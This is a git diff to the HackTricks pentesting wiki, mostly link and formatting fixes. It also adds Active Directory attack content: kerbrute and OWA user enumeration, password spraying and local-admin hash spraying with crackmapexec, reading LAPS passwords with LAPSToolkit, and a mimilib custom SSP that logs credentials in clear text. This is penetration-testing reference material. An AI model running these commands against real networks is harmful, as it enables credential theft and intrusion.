diff --git a/SUMMARY.md b/SUMMARY.md index 2c4a2c0d9..8775b2183 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -205,7 +205,8 @@ * [SmbExec/ScExec](windows-hardening/ntlm/smbexec.md) * [WinRM](windows-hardening/ntlm/winrm.md) * [WmicExec](windows-hardening/ntlm/wmicexec.md) -* [Authentication, Credentials, UAC and EFS](windows-hardening/authentication-credentials-uac-and-efs.md) +* [Windows Security Controls](windows-hardening/windows-security-controls/README.md) + * [UAC - User Account Control](windows-hardening/windows-security-controls/uac-user-account-control.md) * [Stealing Credentials](windows-hardening/stealing-credentials/README.md) * [Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md) * [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md) @@ -364,7 +365,7 @@ * [123/udp - Pentesting NTP](network-services-pentesting/pentesting-ntp.md) * [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md) * [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md) -* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md) +* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb.md) * [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md) * [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md) * [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md) diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md index fee083dac..b15b3b672 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md @@ -4,15 +4,11 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** @@ -148,7 +144,7 @@ The plugin `banners.Banners` can be used in **vol3 to try to find linux banners* ## Hashes/Passwords -Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). +Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/windows-security-controls/#lsa-secrets). {% tabs %} {% tab title="vol3" %} @@ -790,14 +786,10 @@ The MBR holds the information on how the logical partitions, containing [file sy Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 64bff4d2f..b49ffd0db 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -106,7 +106,7 @@ If you are **not root/Administrator** inside the box, you should find a way to * Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ You should also check this pages about how does **Windows work**: -* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md) +* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/windows-security-controls/) * How does [**NTLM works**](../windows-hardening/ntlm/) * How to [**steal credentials**](../windows-hardening/stealing-credentials/) in Windows * Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/) diff --git a/network-services-pentesting/pentesting-smb/README.md b/network-services-pentesting/pentesting-smb.md similarity index 96% rename from network-services-pentesting/pentesting-smb/README.md rename to network-services-pentesting/pentesting-smb.md index c3f94215e..24b723f1a 100644 --- a/network-services-pentesting/pentesting-smb/README.md +++ b/network-services-pentesting/pentesting-smb.md @@ -51,7 +51,7 @@ With an anonymous null session you can access the IPC$ share and interact with s ## What is NTLM -If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../../windows-hardening/ntlm/). +If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../windows-hardening/ntlm/). ## **Enumeration** @@ -141,8 +141,8 @@ enumdomusers ### **Enumerating LSARPC and SAMR rpcclient** -{% content-ref url="rpcclient-enumeration.md" %} -[rpcclient-enumeration.md](rpcclient-enumeration.md) +{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} +[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md) {% endcontent-ref %} ### GUI connection from linux @@ -353,10 +353,10 @@ crackmapexec smb -d -u Administrator -p 'password' --pass-pol #Get crackmapexec smb -d -u Administrator -p 'password' --rid-brute #RID brute ``` -### [**psexec**](../../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/ntlm/smbexec.md) +### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md) Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\ -**More info** about [**psexec** ](../../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/ntlm/smbexec.md).\ +**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ ```bash @@ -369,7 +369,7 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** -### [wmiexec](../../windows-hardening/ntlm/wmicexec.md)/dcomexec +### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ @@ -390,7 +390,7 @@ Using **parameter**`-k` you can authenticate against **kerberos** instead of **N #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` -### [AtExec](../../windows-hardening/ntlm/atexec.md) +### [AtExec](../windows-hardening/ntlm/atexec.md) Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ @@ -416,7 +416,7 @@ ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid ## SMB relay attack This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\ -[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ## SMB-Trap @@ -431,17 +431,17 @@ This happens with the functions: Which are used by some browsers and tools (like Skype) -![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (93).png>) +![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>) ### SMBTrap using MitMf -![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (94).png>) +![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>) ## NTLM Theft -Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](./#smb-relay-attack). +Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack). -[See: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) +[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) ## HackTricks Automatic Commands diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 6f76ea19f..6d38c3230 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -62,8 +62,8 @@ If you just have access to an AD environment but you don't have any credentials/ * `smbclient -U '%' -L // && smbclient -U 'guest%' -L //` * A more detailed guide on how to enumerate a SMB server can be found here: -{% content-ref url="../../network-services-pentesting/pentesting-smb/" %} -[pentesting-smb](../../network-services-pentesting/pentesting-smb/) +{% content-ref url="../../network-services-pentesting/pentesting-smb.md" %} +[pentesting-smb.md](../../network-services-pentesting/pentesting-smb.md) {% endcontent-ref %} * **Enumerate Ldap** @@ -87,7 +87,8 @@ If you just have access to an AD environment but you don't have any credentials/ ### User enumeration -When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC\_ERR\_PREAUTH\_REQUIRED_, indicating that the user is required to perform pre-authentication. +* **Anonymous SMB/LDAP enum:** Check the [**pentesting SMB**](../../network-services-pentesting/pentesting-smb.md) and [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md) pages. +* **Kerbrute enum**: When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC\_ERR\_PREAUTH\_REQUIRED_, indicating that the user is required to perform pre-authentication. ```bash ./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases @@ -100,13 +101,7 @@ msf> use auxiliary/gather/kerberos_enumusers crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq ``` -{% hint style="warning" %} -You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) **** and this one ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)). - -However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) to generate potential valid usernames. -{% endhint %} - -#### **OWA (Outlook Web Access) Server** +* **OWA (Outlook Web Access) Server** If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper): @@ -122,12 +117,23 @@ Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summe Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt ``` +{% hint style="warning" %} +You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) **** and this one ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)). + +However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) to generate potential valid usernames. +{% endhint %} + ### Knowing one or several usernames Ok, so you know you have already a valid username but no passwords... Then try: * [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _DONT\_REQ\_PREAUTH_ you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user. -* [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!) or could login with empty password: [Invoke-SprayEmptyPassword.ps1](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1). +* [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!). + * Note that you can also **spray OWA servers** to try to get access to the users mail servers. + +{% content-ref url="password-spraying.md" %} +[password-spraying.md](password-spraying.md) +{% endcontent-ref %} ### LLMNR/NBT-NS Poisoning @@ -267,6 +273,20 @@ This attack is similar to Pass the Key, but instead of using hashes to request a [pass-the-ticket.md](pass-the-ticket.md) {% endcontent-ref %} +### Credentials Reuse + +If you have the **hash** or **password** of a **local administrato**r you should try to **login locally** to other **PCs** with it. + +```bash +# Local Auth Spray (once you found some local admin pass or hash) +## --local-auth flag indicate to only try 1 time per machine +crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep + +``` + +{% hint style="warning" %} +Note that this is quite **noisy** and **LAPS** would **mitigate** it. +{% endhint %} + ### MSSQL Abuse & Trusted Links If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\ @@ -462,7 +482,7 @@ The **security descriptors** are used to **store** the **permissions** an **obje ### Custom SSP -[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\ +[Learn what is a SSP (Security Support Provider) here.](../windows-security-controls/#security-support-provider-interface-sspi)\ You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.\\ {% content-ref url="custom-ssp.md" %} diff --git a/windows-hardening/active-directory-methodology/custom-ssp.md b/windows-hardening/active-directory-methodology/custom-ssp.md index c752ca621..7c49c270a 100644 --- a/windows-hardening/active-directory-methodology/custom-ssp.md +++ b/windows-hardening/active-directory-methodology/custom-ssp.md @@ -1,28 +1,23 @@ - +# Custom SSP
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+## Custom SSP -# Custom SSP - -[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\ +[Learn what is a SSP (Security Support Provider) here.](../windows-security-controls/#security-support-provider-interface-sspi)\ You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine. -### Mimilib +#### Mimilib You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\ Drop the dll in `C:\Windows\System32\`\ @@ -45,7 +40,7 @@ PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packag And after a reboot all credentials can be found in clear text in `C:\Windows\System32\kiwissp.log` -### In memory +#### In memory You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working): @@ -56,25 +51,18 @@ misc::memssp This won't survive reboots. -## Mitigation +### Mitigation Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages` -
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/laps.md b/windows-hardening/active-directory-methodology/laps.md index 28d05fc4e..5a3d0de67 100644 --- a/windows-hardening/active-directory-methodology/laps.md +++ b/windows-hardening/active-directory-methodology/laps.md @@ -4,15 +4,11 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** @@ -20,7 +16,7 @@ **LAPS** allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES. -When using LAPS, 2 new attributes appear in the computer objects of the domain: _ms-msc-AdmPwd_ and _ms-mcs-AdmPwdExpirationTime._ These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes. +When using LAPS, **2 new attributes** appear in the **computer** objects of the domain: **`ms-msc-AdmPwd`** and **`ms-mcs-AdmPwdExpirationTime`**_._ These attributes contains the **plain-text admin password and the expiration time**. Then, in a domain environment, it could be interesting to check **which users can read** these attributes. ### Check if activated @@ -74,7 +70,35 @@ Get-AdmPwdPassword -ComputerName wkstn-2 | fl Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd ``` -Finally, [**LAPSToolkit**](https://github.com/leoloobeek/LAPSToolkit) **can also be useful for the same purpose.** +### LAPSToolkit + +The [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) facilitates the enumeration of LAPS this with several functions.\ +One is parsing **`ExtendedRights`** for **all computers with LAPS enabled.** This will show **groups** specifically **delegated to read LAPS passwords**, which are often users in protected groups.\ +An **account** that has **joined a computer** to a domain receives `All Extended Rights` over that host, and this right gives the **account** the ability to **read passwords**. Enumeration may show a user account that can read the LAPS password on a host. This can help us **target specific AD users** who can read LAPS passwords. + +```powershell +# Get groups that can read passwords +Find-LAPSDelegatedGroups + +OrgUnit Delegated Groups +------- ---------------- +OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain Admins +OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin + +# Checks the rights on each computer with LAPS enabled for any groups +# with read access and users with "All Extended Rights" +Find-AdmPwdExtendedRights +ComputerName Identity Reason +------------ -------- ------ +MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins Delegated +MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated + +# Get computers with LAPS enabled, expirations time and the password (if you have access) +Get-LAPSComputers +ComputerName Password Expiration +------------ -------- ---------- +DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41 +``` ## **LAPS Persistence** @@ -105,14 +129,10 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** diff --git a/windows-hardening/active-directory-methodology/password-spraying.md b/windows-hardening/active-directory-methodology/password-spraying.md index 8806dc930..4d2295dd1 100644 --- a/windows-hardening/active-directory-methodology/password-spraying.md +++ b/windows-hardening/active-directory-methodology/password-spraying.md @@ -42,37 +42,55 @@ net accounts (Get-DomainPolicy)."SystemAccess" #From powerview ``` -### Exploitation +### Exploitation from Linux (or all) -Using **crackmapexec:** +* Using **crackmapexec:** ```bash crackmapexec smb -u users.txt -p passwords.txt +# Local Auth Spray (once you found some local admin pass or hash) +## --local-auth flag indicate to only try 1 time per machine +crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep + ``` -Using [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it): +* Using [**kerbrute**](https://github.com/ropnop/kerbrute) **** (Go) -```powershell -Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt +```bash +# Password Spraying +./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123 +# Brute-Force 